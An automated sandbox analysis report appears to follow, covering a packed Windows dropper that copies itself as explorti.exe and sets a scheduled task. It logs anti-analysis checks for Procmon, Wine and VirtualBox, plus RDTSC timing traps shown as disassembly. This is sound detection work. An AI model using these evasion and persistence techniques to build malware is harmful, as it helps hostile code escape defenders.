                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: file.exeStatic file information: File size 1900032 > 1048576
                    Source: file.exeStatic PE information: Raw size of wugfyyhr is bigger than: 0x100000 < 0x19e600

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 1.2.explorti.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 2.2.explorti.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 6.2.explorti.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: explorti.exe.0.drStatic PE information: real checksum: 0x1da51b should be: 0x1d54cc
                    Source: file.exeStatic PE information: real checksum: 0x1da51b should be: 0x1d54cc
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: wugfyyhr
                    Source: file.exeStatic PE information: section name: mmvmwoim
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: .idata
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: wugfyyhr
                    Source: explorti.exe.0.drStatic PE information: section name: mmvmwoim
                    Source: explorti.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_0054D84C push ecx; ret 6_2_0054D85F
                    Source: file.exeStatic PE information: section name: entropy: 7.978167044065446
                    Source: file.exeStatic PE information: section name: wugfyyhr entropy: 7.953087307539596
                    Source: explorti.exe.0.drStatic PE information: section name: entropy: 7.978167044065446
                    Source: explorti.exe.0.drStatic PE information: section name: wugfyyhr entropy: 7.953087307539596
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46F14 second address: F46F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F462ED second address: F462F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46868 second address: F46899 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F20h 0x00000007 jno 00007FFAAD0A8F16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jg 00007FFAAD0A8F16h 0x00000019 jmp 00007FFAAD0A8F1Ch 0x0000001e pop ebx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46899 second address: F468AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FFAACBEF8C6h 0x00000009 jo 00007FFAACBEF8C6h 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A546 second address: F4A5D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d je 00007FFAAD0A8F22h 0x00000013 jne 00007FFAAD0A8F1Ch 0x00000019 pop eax 0x0000001a sub dword ptr [ebp+122D312Eh], ecx 0x00000020 push 00000003h 0x00000022 or edx, dword ptr [ebp+122D2B15h] 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D3B50h], eax 0x00000030 mov edi, dword ptr [ebp+122D232Ch] 0x00000036 push 00000003h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FFAAD0A8F18h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 mov ch, ah 0x00000054 mov si, C8E0h 0x00000058 call 00007FFAAD0A8F19h 0x0000005d jmp 00007FFAAD0A8F1Ch 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 push edx 0x00000067 pop edx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A5D9 second address: F4A5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A5DE second address: F4A606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007FFAAD0A8F1Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A606 second address: F4A614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A614 second address: F4A659 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push edi 0x0000000d ja 00007FFAAD0A8F16h 0x00000013 pop edi 0x00000014 jmp 00007FFAAD0A8F1Eh 0x00000019 popad 0x0000001a pop eax 0x0000001b mov dx, 9439h 0x0000001f lea ebx, dword ptr [ebp+1244F3F5h] 0x00000025 pushad 0x00000026 mov edi, 35AD5A9Dh 0x0000002b xor ebx, dword ptr [ebp+122D2C19h] 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 jnp 00007FFAAD0A8F1Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A6E0 second address: F4A6E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A6E4 second address: F4A74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 40808A73h 0x0000000e or dword ptr [ebp+122D1953h], ecx 0x00000014 push 00000003h 0x00000016 mov edi, 31AF8C04h 0x0000001b push 00000000h 0x0000001d stc 0x0000001e push 00000003h 0x00000020 sub dword ptr [ebp+122D1857h], edx 0x00000026 movsx edi, ax 0x00000029 push 80060215h 0x0000002e push eax 0x0000002f pushad 0x00000030 push edi 0x00000031 pop edi 0x00000032 jmp 00007FFAAD0A8F1Dh 0x00000037 popad 0x00000038 pop eax 0x00000039 xor dword ptr [esp], 40060215h 0x00000040 mov dword ptr [ebp+122D18C1h], eax 0x00000046 lea ebx, dword ptr [ebp+1244F3FEh] 0x0000004c jmp 00007FFAAD0A8F1Ah 0x00000051 xchg eax, ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jo 00007FFAAD0A8F16h 0x0000005c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A74D second address: F4A753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A7CC second address: F4A802 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jnl 00007FFAAD0A8F18h 0x00000012 push ebx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop ebx 0x00000016 popad 0x00000017 nop 0x00000018 mov ecx, dword ptr [ebp+122D3204h] 0x0000001e push 00000000h 0x00000020 mov di, cx 0x00000023 push 72CD8846h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c pop eax 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3FD0A second address: F3FD16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FFAACBEF8C6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3FD16 second address: F3FD51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FFAAD0A8F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3FD51 second address: F3FD73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FFAACBEF8C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FFAACBEF8C6h 0x00000013 jmp 00007FFAACBEF8CFh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F69E17 second address: F69E34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FFAAD0A8F22h 0x00000011 jns 00007FFAAD0A8F16h 0x00000017 jns 00007FFAAD0A8F16h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F69E34 second address: F69E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFAACBEF8D8h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F69E52 second address: F69E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6A4D7 second address: F6A4DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6A663 second address: F6A667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6A667 second address: F6A671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6A671 second address: F6A68D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6A68D second address: F6A6B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FFAACBEF8D8h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FFAACBEF8C6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6A6B1 second address: F6A6C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FFAAD0A8F16h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6A6C3 second address: F6A6CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6A6CD second address: F6A6D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6A6D3 second address: F6A6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6A6D9 second address: F6A6DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6A6DE second address: F6A6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6A9DB second address: F6A9E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6A9E5 second address: F6A9E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F9A8 second address: F5F9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FFAAD0A8F16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F9B7 second address: F5F9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F9BB second address: F5F9CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6AB48 second address: F6AB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6AB50 second address: F6AB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FFAAD0A8F16h 0x0000000d jp 00007FFAAD0A8F16h 0x00000013 rdtsc
